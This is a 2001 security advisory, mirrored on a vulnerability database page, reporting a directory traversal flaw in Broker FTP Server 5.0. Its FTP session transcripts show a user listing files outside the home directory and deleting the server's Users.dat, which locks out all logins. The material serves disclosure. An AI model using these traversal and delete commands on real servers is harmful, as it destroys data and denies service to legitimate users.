Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1349
HistoryMar 05, 2001 - 12:00 a.m.

Broker Ftp Server 5.0 Vulnerability

2001-03-0500:00:00
vulners.com
14
JSON

Vulnerability:

users can break out of their root directory and list
directories.
Depending on the priv. you have other commands
like delete maybe
executed outside of the home. directory.

e:\crap\ was used as homedir.
deleting files in e:\crap is enabled

Detail:

Problem: Again relative paths.

dir:
listings directories outside of root dir.
Risc: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29
bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden
323000,00KB/s
ftp> cd …
550 CWD failed. …: No permission

ftp> dir /…/experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000
UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54
Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33
Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34
Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59
BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08
KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37
Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53
Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie
von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden
629000,00KB/s

delete:
deleting files outside of root dir.

ftp> delete /…/experimental/broker/data/users.dat
250 File '/…/experimental/broker/data/users.dat'
deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(

by deleting users.dat, noone will be able to logon …

put/get commands seem to be secure…

This was tested with win2k and trail version of broker
ver. 5.0

[email protected] or
[email protected]

JSON